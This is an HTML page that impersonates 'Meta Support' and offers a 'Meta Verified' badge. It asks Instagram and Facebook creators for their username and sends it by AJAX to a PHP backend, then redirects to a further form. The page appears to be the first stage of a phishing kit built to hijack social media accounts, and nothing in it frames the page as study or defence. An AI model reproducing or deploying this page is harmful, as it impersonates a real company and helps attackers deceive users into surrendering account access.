<!DOCTYPE html>
<html lang="en" class="light-style customizer-hide" dir="ltr" data-theme="theme-default" data-assets-path="../assets/"
  data-template="vertical-menu-template-free">

<head>
  <title>Hi!</title>
  <meta charset="utf-8" />
  <meta name="viewport"
    content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0" />
  <meta name="description" content="" />
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <link rel="stylesheet" href="../assets/css/styles.min.css" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
  <link
    href="https://fonts.googleapis.com/css2?family=Public+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&display=swap"
    rel="stylesheet" />
  <link rel="stylesheet" href="../assets/vendor/fonts/boxicons.css" />
  <link rel="stylesheet" href="../assets/vendor/css/core.css" class="template-customizer-core-css" />
  <link rel="stylesheet" href="../assets/vendor/css/theme-default.css" class="template-customizer-theme-css" />
  <link rel="stylesheet" href="../assets/css/demo.css" />
  <link rel="stylesheet" href="../assets/vendor/libs/perfect-scrollbar/perfect-scrollbar.css" />
  <link rel="stylesheet" href="../assets/vendor/css/pages/page-auth.css" />
  <script src="../assets/vendor/js/helpers.js"></script>
  <script src="../assets/js/config.js"></script>
</head>

<body>
  <nav class="navbar navbar-example navbar-expand-lg navbar-light bg-light">
    <div class="container-fluid">
      <a class="navbar-brand" href="javascript:void(0)">Meta Support</a>
      <button class="navbar-toggler collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#navbar-ex-2"
        aria-controls="navbar-ex-2" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>
      <div class="navbar-collapse collapse" id="navbar-ex-2">
        <div class="navbar-nav me-auto">
          <a class="nav-item nav-link active" href="javascript:void(0)">Home</a>
          <a class="nav-item nav-link" href="javascript:void(0)">About</a>
          <a class="nav-item nav-link" href="javascript:void(0)">Contact</a>
        </div>
        <br>
        <span class="navbar-text">Meta Support Team - Establish your presence as a creator on Instagram and Facebook
        </span>
      </div>
    </div>
  </nav>

  <div class="container-xxl">
    <div class="authentication-wrapper authentication-basic container-p-y">

      <div class="authentication-inner">
        <div class="card">

          <div class="card-body">
            <br> <br>
            <div class="app-brand justify-content-center">
              <img style="width: 200px; top: -18px; right: -100px; border-radius: 100px;"
                class="pp-brand justify-content-center" src="../assets/img/backgrounds/gif.gif">
            </div>
            <br>
            <h3 style="margin-left: 85px;">Meta Verified!</h3>
            <p class="lead mb-0">
              Hello, Welcome to the Verification Badge Form. Continue by Entering Your Username and Be Careful to
              Complete the Steps Successfully.
            </p>
            <br>
            <form id="usernameform">
              <div class="mb-3">
              </div>
              <div class="mb-3 form-password-toggle">
                <div class="d-flex justify-content-between">
                  <label class="form-label" for="password">Username</label>
                </div>
                <div class="input-group input-group-merge">
                  <input type="text" id="username" class="form-control" name="username" placeholder="Username"
                    aria-describedby="password" required oninput="checkInputLength(this)" />

                  <span class="input-group-text cursor-pointer"></span>
                </div>
              </div>
              <div class="mb-3">

              </div>
              <div class="mb-3">
                <button id="ajaxButton" class="btn btn-primary d-grid w-100" onclick="addSpinner()">Continue</button>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="../assets/vendor/libs/jquery/jquery.js"></script>
  <script src="../assets/vendor/libs/popper/popper.js"></script>
  <script src="../assets/vendor/js/bootstrap.js"></script>
  <script src="../assets/vendor/libs/perfect-scrollbar/perfect-scrollbar.js"></script>
  <script src="../assets/vendor/js/menu.js"></script>
  <script src="../assets/js/main.js"></script>
  <script async defer src="https://buttons.github.io/buttons.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
    const username = document.getElementById('username');
    username.addEventListener('input', (event) => {
      const value = event.target.value;
      if (value.includes(' ') || value.includes('@')) {
        event.target.value = value.replace(/[\s@]/g, '');
      }
    });
  </script>
  <script>
    $(document).ready(function () {
      $('#usernameform').submit(function (event) {
        event.preventDefault();

        var form = $(this);
        var button = $("#ajaxButton");
        var username = $("#username").val();

        button.html("<i class='fa fa-spinner fa-spin'></i>");
        button.prop('disabled', true);

        $.ajax({
          url: "app/profile.php",
          type: "POST",
          data: {
            username: username,
          },
          success: function (response) {
            if (response === "usernamefound") {
              window.location.href = "form.php?username=" + encodeURIComponent(username);
            } else if (response === "usernamenotfound") {
              Swal.fire({
                icon: 'error',
                title: 'Wrong Username',
                text: 'The username you entered is incorrect, please check your username and try again.',
                confirmButtonColor: '#007BFF'
              });
            } else {
              Swal.fire({
                icon: 'error',
                title: 'ERROR',
                text: 'Please try again.',
                confirmButtonColor: '#007BFF'
              });
            }
          },
          error: function (error) {
            console.log("Hata: " + error);
            Swal.fire({
              icon: 'error',
              title: 'ERROR',
              text: 'Please try again.',
              confirmButtonColor: '#007BFF'
            });
          },
          complete: function () {
            button.html("Continue");
            button.prop('disabled', false);
          }
        });
      });
    });
  </script>
</body>

</html>